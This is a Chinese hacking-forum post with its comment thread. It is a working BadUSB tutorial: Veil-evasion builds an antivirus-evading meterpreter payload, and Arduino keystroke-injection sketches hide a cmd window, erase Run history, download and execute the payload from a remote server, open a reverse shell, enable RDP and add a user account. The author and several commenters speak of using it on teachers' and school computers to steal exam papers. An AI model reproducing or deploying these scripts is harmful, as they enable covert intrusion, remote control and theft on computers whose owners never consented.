利用烧鹅制作简单BadUSB,插谁谁怀孕
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 14:12
所用硬件设备为烧鹅,烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板。
使用veil编码meterpreter生成payload(经过编码的payload在杀软中仅能够存活几分钟),放到服务器上。插入烧鹅,模拟键盘输入,在cmd中下载payload,并执行。
0x1 利用veil编码打造免杀的meterpreter
root@kali:~# veil-evasion //启动veil
[>] Please enter a command: list //查看可选列表
26) python/meterpreter/rev_tcp
[>] Please enter a command: 26 //这里选择编号为26的payload
[>] Please enter a command: set LHOST 192.168.31.233 //设置LHOST
[>] Please enter a command: generate //对payload进行编码
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: a //输入生成的payload名字
[>] Please enter the number of your choice: 1 //选择编码方式
[*] Executable written to: /root/veil-output/compiled/a1.exe //生成经过编码的payload位置
0x2 将执行代码写入badusb中
使用Arduino IDE 写入,其中下载使用的是PowerShell,如果使用vbs那种方法,360会报警.
void setup() { //初始化,这里的代码只执行一次
delay(5000); //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // 按下Win键
Keyboard.set_key1(KEY_R); // 同时按下R键
Keyboard.send_now(); // 发送Win+R
delay(100);
Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");
//开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(300);
Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); //利用注册表清除开始--运行的记录
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.println("powershell (new- object System.Net.WebClient).DownloadFile('http://192.168.1.100 /a1.exe','D:\\1.exe')"); //下载远程的payload
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(3000); //设置延迟,等待下载完成
Keyboard.println("d:\\1.exe"); //执行打开命令
Keyboard.set_key1(KEY_ENTER);
delay(300);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_SPACE);
Keyboard.set_key2(KEY_C);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.set_key2(0);
Keyboard.send_now(); //关闭cmd窗口
}
void loop() //循环,这里的代码无限循环
{
}
0x3 等待目标连接
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E //开始监听,等待连接
将USB插入目标机器,执行相关命令
目标机器上线
PS:玩法还有很多,还可以开启目标机器3389,新建用户等等,快要期末考试了,不要拦着我,我要去插下老师的机器......
相关内容:
各种吐槽:
1#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 14:15
对于win7开启3389,并加帐户,使用
void setup() { //初始化,这里的代码只执行一次
delay(5000); //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // 按下Win键
Keyboard.set_key1(KEY_R); // 同时按下R键
Keyboard.send_now(); // 发送Win+R
delay(100);
Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");
//开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(300);
Keyboard.println("REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"); //开启3389
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.println("net user 123 123 /add"); //添加帐户
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_SPACE);
Keyboard.set_key2(KEY_C);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.set_key2(0);
Keyboard.send_now(); //关闭cmd
}
void loop() //循环,这里的代码无限循环
{
}
在学校中利用3389比meterpreter更加好用。开启3389,杀软不会提示。添加帐户,360会提示,电脑管家不会提示。
2#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 14:18
对于执行修改dns等一些需要输入中文的地方,就比较麻烦了,暂时还没想到好的方法,只想到模拟键盘输入 Shift + Ctrl开启输入法....利用条件比较苛刻
3#
高斯 | 2015-05-25 14:20
参考 大黄鸭
4#
YangCL | 2015-05-25 14:22
@海绵宝宝 学校电脑裸奔的。
5#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 14:24
@YangCL 裸奔的,插进去,拔出来,get shijuan.
6#
海边风 | 2015-05-25 14:40
说好的录视频呢
7#
千斤拨四两 | 2015-05-25 14:52
@海绵宝宝 去试试老段的,你考试就过了,- -!
8#
人丑嘴不甜 | 2015-05-25 15:03
别拦我,我要给猴粑粑生猴子
9#
L·Lawliet | 2015-05-25 15:06
已经向网络中心举报@网络中心主任,遇到此猴,请迅速转移服务器
10#
jeary ((:?办么怎,了多越来越法方象抽的我)) | 2015-05-25 15:08
@海绵宝宝 电脑中文输入法状态下,攻击payload无法执行 满屏代码..
11#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 15:17
@jeary 在当前输入法是qq拼音的情况下,测试的是,在发送win+R后,之后进行的操作都会默认是英文模式,包括在运行窗口输入cmd和在cmd中输入命令,即使开启了qq拼音的情况下, 输入的依然是英文。
如果因为环境问题,输入的不是英文,那么可以在每输入一个单词之后发送Shift,目前很多输入法在中文输入模式下,发送Shift,是选择英文.
12#
漂流瓶 (http://shota.cc/) | 2015-05-25 15:18
相当于模拟键盘么
13#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 15:21
@漂流瓶 嗯,模拟键盘输入
14#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 15:21
@千斤拨四两 @段老师
15#
whirlwind (不好好写代码的黑客不是好黑客,风要有创意的敲代码!) | 2015-05-25 16:02
有驱动级的么
16#
lnterface | 2015-05-25 16:36
烧鹅在哪买,楼主来一只
17#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 16:42
@lnterface 私信你了
18#
生鲜一手 (重剑无锋,大巧不工) | 2015-05-25 17:22
@海绵宝宝 同问。。
19#
Ocean | 2015-05-25 17:29
同求在哪里买
20#
B1n4ry (苦逼的生存着。。。) | 2015-05-25 17:41
更多玩法,参阅 wiki.radiowar.org !
21#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 17:53
@Ocean @生鲜一手 已私信
22#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 17:53
@B1n4ry 很多新玩法,棒棒哒
23#
prolog (事了拂衣去,不收一分钱) | 2015-05-25 17:58
几百块。。烧钱
24#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 18:01
@prolog 看个人情况,我是比较需要这个 :)
25#
小菜虫 | 2015-05-25 18:26
同求在哪里买
26#
小菜虫 | 2015-05-25 18:28
@高斯 国内哪有卖啊
27#
her0ma | 2015-05-25 18:42
想知道硬件从被攻击电脑拔掉之后,获取的权限还会在吗?
28#
B1n4ry (苦逼的生存着。。。) | 2015-05-25 18:53
@her0ma 会的,执行完了,就可以扯掉走人了!
29#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-25 18:55
@her0ma 会在的,我是把meterpreter直接下载到他的电脑上了。不过要不了几分钟,杀软就报了。T_T
30#
Anymous (专注于廉价迷你方便快捷的解决方案ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้้ด้้้้้็็็็็้้้้้็็็็็้้) | 2015-05-25 19:11
仍然倾向arduino micro。
31#
疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-05-25 19:34
插入的手法好风骚
32#
疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-05-25 19:35
@Anymous 赞ATmega32u4芯
33#
class (我只会xxoo) | 2015-05-25 19:44
手法好风骚,插入时,先摩擦摩擦,学习了。
34#
刘海哥 (moc.ghuil.www) | 2015-05-25 21:56
手法好风骚,插入时,先摩擦摩擦,学习了。
35#感谢(1)
pikachu | 2015-05-25 23:36
马上大家都去买烧鹅了
36#
一只猿 (我是猴子派来的彩笔) | 2015-05-25 23:41
arduino pro mini 和 arduino micro ,呼呼,送妹子一个键盘
37#
Hxai11 (求工作) | 2015-05-26 09:18
马克。
38#
jeary ((:?办么怎,了多越来越法方象抽的我)) | 2015-05-26 09:21
烧鹅太贵,买不起,还是U盘比较便宜35-50就能买一个
http://zone.wooyun.org/content/20001
39#
海盗湾V | 2015-05-26 09:58
同求在哪里买
40#
S0cial | 2015-05-26 10:46
要剁手了...
41#
xsser (十根阳具有长短!!) | 2015-05-26 11:20
@乌云集市
42#
小牛牛 | 2015-05-26 11:26
我也要,我要去插学校充饭卡的
43#
saviour (Saviour.Com.Cn 正在备案中~~~) | 2015-05-26 11:45
你这个弱爆了 都不这么搞了
44#
B1n4ry (苦逼的生存着。。。) | 2015-05-26 15:21
@xsser 集市上什么时候上了? 为何我不知啊?
45#感谢(1)
B1n4ry (苦逼的生存着。。。) | 2015-05-26 15:26
@saviour 一般都是这么搞的 ?
46#
疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-05-26 15:45
@B1n4ry @saviour 直接读取SD存储中的木马?
47#
B1n4ry (苦逼的生存着。。。) | 2015-05-26 16:07
@疯狗 http://www.freebuf.com/tools/68265.html
48#
疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-05-26 16:28
@B1n4ry 嗯 好奇现在是有啥新玩法
49#
CplusHua | 2015-05-26 17:00
win8下如果用户启用的是win8自带输入法有办法能够盲关闭吗?
50#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-26 17:01
@CplusHua win8下你自己怎么关闭,就模拟键盘输入关闭
51#
白 | 2015-05-26 17:05
求购买地址 谢谢
52#
CplusHua | 2015-05-26 17:06
@海绵宝宝 敲一下ctrl+space切换中英文 再+shift就得到永英文了. (因为shift在输入法关闭的时候按一下没用),但是这个问题在win8自带的系统输入法里就不同了......有能够绕过的童鞋嘛?
53#
CplusHua | 2015-05-26 17:07
@CplusHua 关闭不了........(首先你不知道他是开的还是关的...)
54#
白 | 2015-05-26 17:24
@海绵宝宝 问下 普通的U盘也能用这个写入么???
55#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-26 17:28
@白 参考这个http://zone.wooyun.org/content/20001
56#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-26 17:29
@CplusHua 这个就很蛋疼了,如果提前知道的话,还有办法解决,不知道的话,暂时还没想到好的方法解决
57#
CplusHua | 2015-05-26 17:41
@海绵宝宝 就win8难解决 ,其他都可以 :敲一下ctrl+space切换中英文 再+shift就得到永英文了. 另外,有人根据键盘灯来做的,就是根据键盘灯的亮与不亮作为控制信号的反馈,具体不知道如何实现的.
58#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-26 17:44
@CplusHua 在实际应用中确实还有很多问题需要解决
59#
90Snake | 2015-05-26 22:23
@xsser @乌云集市
60#
Airbasic (ส็็็็็็็็็็็็็็็็็็็็็็็็) | 2015-05-27 11:46
看视频感觉你的键盘要被按坏了
61#
周文王 (乾道大哉,而至正) | 2015-05-27 14:02
这个好玩
62#
Wooyun第一大屌 | 2015-05-27 18:46
@海绵宝宝 我擦,你们没有考虑过360添加帐号的时候会警告?
63#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-28 09:50
@Wooyun第一大屌 我上面已经说了啊,添加账户360会提示。不过貌似已经有人找到过验证的方法了。
64#
Wooyun第一大屌 | 2015-05-28 09:51
@Wooyun第一大屌 sorry,眼瞎没看清楚, 每个人的电脑装的杀软都是不一样,有些是国外的, 所以局限性还是有的。 就因为不免杀。
65#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-28 09:58
@Wooyun第一大屌 这个就是马的问题了,跟这个硬件没关系 (≖ ‿ ≖)✧
66#
admin | 2015-05-28 15:19
执行下载的时候 报错 “new- : 无法将“new-”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请检查
名称的拼写,如果包括路径,请确保路径正确,然后再试一次。” 怎么破?@海绵宝宝
67#
admin | 2015-05-28 15:34
对付中文输入法的!好简单的问题,开启大写模式!
Keyboard.set_key1(KEY_CAPS_LOCK);
Keyboard.send_now();
68#
海绵宝宝 (剑未配好,出门已是江湖) | 2015-05-28 16:43
@admin new-object 中间没有空格
69#
裙下的秘密 | 2015-05-28 16:54
@海绵宝宝 求个购买地址,买一个玩下,私信你啦-。-
70#
酱油甲 | 2015-05-29 10:42
看起来很流弊的样子~
留言评论(旧系统):